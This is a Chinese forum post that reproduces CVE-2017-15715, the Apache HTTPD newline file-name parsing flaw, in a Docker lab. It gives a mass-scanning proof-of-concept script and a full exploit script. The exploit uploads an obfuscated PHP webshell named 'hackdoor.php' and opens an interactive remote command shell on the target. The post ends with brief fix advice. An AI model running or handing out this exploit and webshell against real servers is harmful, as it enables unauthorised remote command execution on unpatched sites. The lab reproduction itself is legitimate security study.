Apache HTTPD 换行解析漏洞

打印 上一主题 下一主题

主题 1781|帖子 1781|积分 5343

漏洞介绍

CVE-2017-15715
Apache HTTPD 是一个广泛使用的 HTTP 服务器,可以通过 mod_php 模块来运行 PHP 网页。在其 2.4.0 到 2.4.29 版本中存在一个解析漏洞,当文件名以 1.php\x0A 结尾时,该文件会被按照 PHP 文件进行解析,这使得攻击者可以绕过服务器的一些安全计谋。
环境搭建

  1. docker compose build
  2. docker compose up -d
复制代码
检测web使用的服务器,Apache 2.4.10版本,可能存在Apache HTTPD 解析漏洞

漏洞复现

上传一个phpinfo的文件
  1. <?php phpinfo();?>
复制代码
首先,尝试上传一个名为 phpin.php 的文件,可以看到上传被安全检查拦截:

切换到Hex,在1.php后添加0a
但是,如果我们在文件名 1.php 后面添加一个 \x0A(注意:必须是单独的 \x0A,而不是 \x0D\x0A),上传就会成功:

发送数据包,如图所示

在ubuntu上查看信息,科里面可以看到我们上传的11.php文件
  1. #查看镜像CONTAINER ID
  2. docker ps
  3. root@xuan-virtual-machine:/home/xuan/vulhub/httpd/CVE-2017-15715# docker exec -it cve-2017-15715_apache_1  bash
  4. root@2dbf622e717a:/var/www/html# ls
  5. 11.php?  index.php
复制代码
浏览器进行访问[http://192.168.118.135:8080/11.php%0A](http://192.168.118.135:8080/11.php )
当访问上传的文件 /1.php%0a 时,虽然该文件没有正确的 PHP 扩展名,但它会被成功解析为 PHP 文件。这证实了解析漏洞的存在:

POC和EXP脚本

  1. #CVE-2017-15715-POC
  2. __author__ = '纸机'
  3. import requests
  4. import optparse
  5. import os
  6. parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
  7. parse.add_option('-u','--url',dest='URL',help='target url')
  8. parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
  9. parse.add_option('-f',dest='FILE',help='target list')
  10. options,args = parse.parse_args()
  11. #print(options)
  12. #验证参数是否完整
  13. if (not options.URL or not options.PORT) and not options.FILE:
  14.         print('Usage:python3 CVE-2017-15715-POC.py [-u url] [-p port] [-f FILE]\n')
  15.         exit('CVE-2017-15715-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
  16. filename = '/2.php%0A'
  17. headers={
  18.   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
  19.   'Content-Type': 'multipart/form-data; boundary=---------------------------153388130435749919031880185481'
  20.   }
  21. #提交数据
  22. data = '''-----------------------------153388130435749919031880185481
  23. Content-Disposition: form-data; name="file"; filename="2.php"
  24. Content-Type: application/octet-stream
  25. aaa
  26. -----------------------------153388130435749919031880185481
  27. Content-Disposition: form-data; name="name"
  28. 2.php
  29. -----------------------------153388130435749919031880185481--'''
  30. #验证链接
  31. #url2 = options.URL+':'+options.PORT+filename
  32. def upload(url):
  33.   try:
  34.       #上传文件
  35.       resp = requests.post(url,headers=headers,data=data)
  36.       return 1
  37.   except Exception as e:
  38.     print("[-] {0} 连接失败".format(url))
  39.     return 0
  40. def checking(url):
  41.   try:
  42.     #验证文件是否上传成功
  43.     response = requests.get(url+filename)
  44.     if response.status_code == 200 and 'aaa' in response.text:
  45.         print('[+] {0} 存在CVE-2017-15715 Apache HTTPD 换行解析漏洞'.format(url))
  46.     else:
  47.         print('[-] {0} 不存在Apache HTTPD 换行解析漏洞'.format(url))
  48.   except Exception as e:
  49.     print("[-]{0}连接失败".format(url))
  50. if options.FILE and os.path.exists(options.FILE):
  51.   with open(options.FILE) as f:
  52.     urls = f.readlines()
  53.     #print(urls)
  54.     for url in urls:
  55.       url = str(url).replace("\n", "")
  56.       if upload(url) == 1:
  57.         checking(url)
  58. elif options.FILE and not os.path.exists(options.FILE):
  59.   print('[-] {0} 文件不存在'.format(options.FILE))
  60. else:
  61.   #上传链接
  62.   url = options.URL+':'+options.PORT
  63.   if upload(url) == 1:
  64.     checking(url)
复制代码
  1. python .\CVE-2017-15715-POC.py  -u http://192.168.118.135  -p 8080
复制代码

EXP
  1. #CVE-2017-15715 EXP
  2. __author__ = 'zhiji'
  3. import requests
  4. import optparse
  5. import time
  6. parse = optparse.OptionParser(usage = 'python3 %prog -u url [-p port] version=1.0')
  7. parse.add_option('-u','--url',dest='url',help='web server ip_addr')
  8. parse.add_option('-p','--port',dest='port',help='web server port[default:8080]',default='8080')
  9. options,args = parse.parse_args()
  10. #验证参数是否完整
  11. if not options.url or not options.port:
  12.         print('Usage:python3 CVE-2017-15715-EXP.py -u url -p port\n')
  13.         exit('CVE-2017-15715-EXP.py:error:missing a mandatory option(-u,-p).\nUse -h for basic and -hh for advanced help')
  14. #ip = '192.168.132.142:8080/'
  15. filename = '/hackdoor.php%0a?0='
  16. #上传链接
  17. url1 = options.url+':'+options.port
  18. #命令执行
  19. url2 = options.url+':'+options.port+filename
  20. #数据包头部
  21. headers = {
  22.   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
  23.   'Content-Type': 'multipart/form-data; boundary=---------------------------153388130435749919031880185481'
  24.   }
  25. #上传数据
  26. data = '''-----------------------------153388130435749919031880185481
  27. Content-Disposition: form-data; name="file"; filename="hackdoor.php"
  28. Content-Type: application/octet-stream
  29. <?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
  30. -----------------------------153388130435749919031880185481
  31. Content-Disposition: form-data; name="name"
  32. hackdoor.php
  33. -----------------------------153388130435749919031880185481--'''
  34. #上传木马
  35. def upload(url):
  36.   print('[*]目标地址:'+url1)
  37.   respond = requests.post(url1,headers=headers,data=data)
  38.   try:
  39.     if respond.status_code == 200:
  40.       print('[+]木马上传成功')
  41.     else:
  42.       print('[-]上传失败')
  43.   except Exception as e:
  44.     print(e)
  45. #命令执行
  46. def attack(url,cmd):
  47.   respond = requests.get(url+cmd)
  48.   try:
  49.     if respond.status_code == 200 and cmd == 'pwd':
  50.       return respond.text
  51.     if respond.status_code == 200:
  52.       print(respond.text)
  53.     else:
  54.       print('命令执行错误')
  55.   except Exception as e:
  56.     print(e)
  57. upload(url1)
  58. time.sleep(0.5)
  59. print('输入执行命令(quit退出):')
  60. while(1):
  61.   pwd = attack(url2,'pwd')
  62.   pwd = '{0}>'.format(str(pwd).replace("\n",""))
  63.   cmd = input(pwd)
  64.   if(cmd == 'quit'):
  65.     break
  66.   attack(url2,cmd)
复制代码
  1. python .\CVE-2017-15715-EXP.py  -u http://192.168.118.135  -p 8080
复制代码

修复发起



  • 升级到最新版本
  • 对上传文件重命名
  • 禁用上传文件的实验权限

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

傲渊山岳

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表